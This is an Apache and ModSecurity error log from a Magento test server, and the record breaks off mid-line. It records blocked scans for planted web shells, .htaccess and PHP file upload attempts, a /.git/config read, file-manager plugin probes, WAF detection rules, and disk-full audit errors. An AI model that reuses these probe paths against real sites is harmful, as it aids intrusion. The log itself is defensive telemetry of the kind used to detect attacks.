[Thu Mar 26 03:41:17.872194 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/xwx1.php' not found or unable to stat
[Thu Mar 26 03:41:18.068418 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/x1da.php' not found or unable to stat
[Thu Mar 26 03:41:18.264763 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/des.php' not found or unable to stat
[Thu Mar 26 03:41:18.462050 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/kaza.php' not found or unable to stat
[Thu Mar 26 03:41:18.658468 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/file51.php' not found or unable to stat
[Thu Mar 26 03:41:18.861844 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/blurbs15.php' not found or unable to stat
[Thu Mar 26 03:41:19.071156 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/bless11.php' not found or unable to stat
[Thu Mar 26 03:41:19.278575 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/security.php' not found or unable to stat
[Thu Mar 26 03:41:19.482241 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/ar.php' not found or unable to stat
[Thu Mar 26 03:41:19.687530 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/chosen.php' not found or unable to stat
[Thu Mar 26 03:41:19.891668 2026] [php:error] [pid 2946674] [client 20.151.11.236:8602] script '/var/www/magento.test.indacotrentino.com/www/pub/xoot.php' not found or unable to stat
[Thu Mar 26 03:44:53.633960 2026] [:error] [pid 2946674] [client 101.99.88.90:39716] [client 101.99.88.90] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdpYx4icjC4I1Sx2l2vgAAAAU"]
[Thu Mar 26 03:44:53.634099 2026] [:error] [pid 2946674] [client 101.99.88.90:39716] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdpYx4icjC4I1Sx2l2vgAAAAU"]
[Thu Mar 26 03:44:53.634250 2026] [:error] [pid 2946674] [client 101.99.88.90:39716] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdpYx4icjC4I1Sx2l2vgAAAAU"]
[Thu Mar 26 03:44:53.816925 2026] [:error] [pid 2946674] [client 101.99.88.90:39716] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: wp-login.php found within FILES:file: wp-login.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdpYx4icjC4I1Sx2l2vwAAAAU"]
[Thu Mar 26 03:44:53.817047 2026] [:error] [pid 2946674] [client 101.99.88.90:39716] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdpYx4icjC4I1Sx2l2vwAAAAU"]
[Thu Mar 26 03:44:53.817179 2026] [:error] [pid 2946674] [client 101.99.88.90:39716] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdpYx4icjC4I1Sx2l2vwAAAAU"]
[Thu Mar 26 03:44:54.001517 2026] [php:error] [pid 2946674] [client 101.99.88.90:39716] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-login.php' not found or unable to stat
[Thu Mar 26 03:45:04.554538 2026] [:error] [pid 2946667] [client 101.99.88.90:34260] [client 101.99.88.90] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: wp-login.php found within FILES:file: wp-login.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdsAv5R5_uIdLUnMQsUgAAAAI"]
[Thu Mar 26 03:45:04.554681 2026] [:error] [pid 2946667] [client 101.99.88.90:34260] [client 101.99.88.90] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdsAv5R5_uIdLUnMQsUgAAAAI"]
[Thu Mar 26 03:45:04.554832 2026] [:error] [pid 2946667] [client 101.99.88.90:34260] [client 101.99.88.90] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acSdsAv5R5_uIdLUnMQsUgAAAAI"]
[Thu Mar 26 03:45:04.738283 2026] [php:error] [pid 2946667] [client 101.99.88.90:34260] script '/var/www/magento.test.indacotrentino.com/www/pub/wp-login.php' not found or unable to stat
[Thu Mar 26 08:59:52.945627 2026] [:error] [pid 3107086] [client 112.111.185.219:27722] [client 112.111.185.219] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTneClRgb1RwnU5385OTQAAAAY"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 08:59:52.945994 2026] [:error] [pid 3107086] [client 112.111.185.219:27722] [client 112.111.185.219] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTneClRgb1RwnU5385OTQAAAAY"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 08:59:52.946125 2026] [:error] [pid 3107086] [client 112.111.185.219:27722] [client 112.111.185.219] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTneClRgb1RwnU5385OTQAAAAY"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 08:59:55.979124 2026] [:error] [pid 3107086] [client 112.111.185.219:27722] [client 112.111.185.219] ModSecurity: Warning. Matched phrase ".htaccess" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "601"] [id "932180"] [msg "Restricted File Upload Attempt"] [data "Matched Data: .htaccess found within FILES:file: .htaccess"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTneylRgb1RwnU5385OTgAAAAY"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 08:59:55.979482 2026] [:error] [pid 3107086] [client 112.111.185.219:27722] [client 112.111.185.219] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTneylRgb1RwnU5385OTgAAAAY"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 08:59:55.979639 2026] [:error] [pid 3107086] [client 112.111.185.219:27722] [client 112.111.185.219] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTneylRgb1RwnU5385OTgAAAAY"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 09:00:05.590954 2026] [:error] [pid 3107099] [client 112.111.185.219:27774] [client 112.111.185.219] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: index.php found within FILES:file: index.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTnhcUifWyEMxVFsupLdwAAAAs"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 09:00:05.591331 2026] [:error] [pid 3107099] [client 112.111.185.219:27774] [client 112.111.185.219] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTnhcUifWyEMxVFsupLdwAAAAs"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 09:00:05.591497 2026] [:error] [pid 3107099] [client 112.111.185.219:27774] [client 112.111.185.219] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-blog-header.php"] [unique_id "acTnhcUifWyEMxVFsupLdwAAAAs"], referer: https://autumnus.test.indacotrentino.com/wp-blog-header.php
[Thu Mar 26 09:00:34.076449 2026] [:error] [pid 3107099] [client 112.111.185.219:27867] [client 112.111.185.219] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:f. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: index.php found within FILES:f: index.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/media/import/"] [unique_id "acTnocUifWyEMxVFsupLeQAAAAs"], referer: https://autumnus.test.indacotrentino.com/pub/media/import/
[Thu Mar 26 09:00:34.077357 2026] [:error] [pid 3107099] [client 112.111.185.219:27867] [client 112.111.185.219] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/media/import/"] [unique_id "acTnocUifWyEMxVFsupLeQAAAAs"], referer: https://autumnus.test.indacotrentino.com/pub/media/import/
[Thu Mar 26 09:00:34.077512 2026] [:error] [pid 3107099] [client 112.111.185.219:27867] [client 112.111.185.219] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/media/import/"] [unique_id "acTnocUifWyEMxVFsupLeQAAAAs"], referer: https://autumnus.test.indacotrentino.com/pub/media/import/
[Thu Mar 26 09:01:16.347394 2026] [:error] [pid 3106409] [client 112.111.185.219:28013] [client 112.111.185.219] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:f. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: index.php found within FILES:f: index.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/media/import/"] [unique_id "acTnzBshOmBt5DmIO41ZDgAAACE"], referer: https://autumnus.test.indacotrentino.com/pub/media/import/
[Thu Mar 26 09:01:16.348415 2026] [:error] [pid 3106409] [client 112.111.185.219:28013] [client 112.111.185.219] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/media/import/"] [unique_id "acTnzBshOmBt5DmIO41ZDgAAACE"], referer: https://autumnus.test.indacotrentino.com/pub/media/import/
[Thu Mar 26 09:01:16.348575 2026] [:error] [pid 3106409] [client 112.111.185.219:28013] [client 112.111.185.219] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/media/import/"] [unique_id "acTnzBshOmBt5DmIO41ZDgAAACE"], referer: https://autumnus.test.indacotrentino.com/pub/media/import/
[Thu Mar 26 09:01:38.739919 2026] [:error] [pid 3107099] [client 112.111.185.219:28151] [client 112.111.185.219] ModSecurity: Rule 7f6f1d229be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/media/import/"] [unique_id "acTn4sUifWyEMxVFsupLewAAAAs"], referer: https://autumnus.test.indacotrentino.com/pub/media/import/
[Thu Mar 26 16:17:21.805883 2026] [:error] [pid 3344397] [client 216.81.200.83:55832] [client 216.81.200.83] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "acVOAdBBXP8sRpfjwSOUSQAAAAk"]
[Thu Mar 26 16:17:21.806055 2026] [:error] [pid 3344397] [client 216.81.200.83:55832] [client 216.81.200.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "acVOAdBBXP8sRpfjwSOUSQAAAAk"]
[Thu Mar 26 16:17:21.806180 2026] [:error] [pid 3344397] [client 216.81.200.83:55832] [client 216.81.200.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "acVOAdBBXP8sRpfjwSOUSQAAAAk"]
[Thu Mar 26 17:26:06.570471 2026] [:error] [pid 3230778] [client 145.220.91.19:45784] [client 145.220.91.19] ModSecurity: Audit log: Failed writing (requested 15 bytes, written 0): No space left on device [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "acVeHo49gFQHnY-IPpMbLAAAAAI"]
[Thu Mar 26 18:06:10.289898 2026] [:error] [pid 3337408] [client 198.186.131.58:42794] [client 198.186.131.58] ModSecurity: Audit log: Failed writing (requested 15 bytes, written 0): No space left on device [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "acVngh1fFxPP_PapXnsYvgAAAAs"]
[Thu Mar 26 18:06:11.029944 2026] [:error] [pid 3216441] [client 198.186.131.58:37170] [client 198.186.131.58] ModSecurity: Audit log: Failed writing (requested 15 bytes, written 0): No space left on device [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/index.php"] [unique_id "acVngujWecMa5MI1PkvybAAAAAA"]
[Thu Mar 26 18:06:20.561844 2026] [:error] [pid 3236333] [client 198.186.131.58:60086] [client 198.186.131.58] ModSecurity: Audit log: Failed writing (requested 15 bytes, written 0): No space left on device [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/rest/V1/guest-carts/845/order"] [unique_id "acVnjDwY9XgLioM_0gHTBgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/
[Thu Mar 26 18:28:54.385847 2026] [:error] [pid 3409015] [client 20.207.203.57:56496] [client 20.207.203.57] ModSecurity: Audit log: Failed writing (requested 15 bytes, written 0): No space left on device [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/wp-blog-header.php"] [unique_id "acVs1qEurrahokAJoCUWHQAAAAE"]
[Thu Mar 26 20:49:15.613253 2026] [:error] [pid 3216147] [client 4.204.200.32:30737] [client 4.204.200.32] ModSecurity: Audit log: Failed writing (requested 15 bytes, written 0): No space left on device [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "acWNuyWkFmKYiFxmQJP3eQAAAAc"]
[Thu Mar 26 20:49:15.953278 2026] [:error] [pid 3216554] [client 4.204.200.32:30738] [client 4.204.200.32] ModSecurity: Audit log: Failed writing (requested 15 bytes, written 0): No space left on device [hostname "autumnus.test.indacotrentino.com"] [uri "/pub/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "acWNuxpNcMI2se-BiDQX1gAAAAU"]
[Thu Mar 26 20:49:16.052089 2026] [:error] [pid 3216147] [client 4.204.200.32:30737] [client 4.204.200.32] ModSecurity: Audit log: Failed writing (requested 15 bytes, written 0): No space left on device [hostname "autumnus.test.indacotrentino.com"] [uri "/cont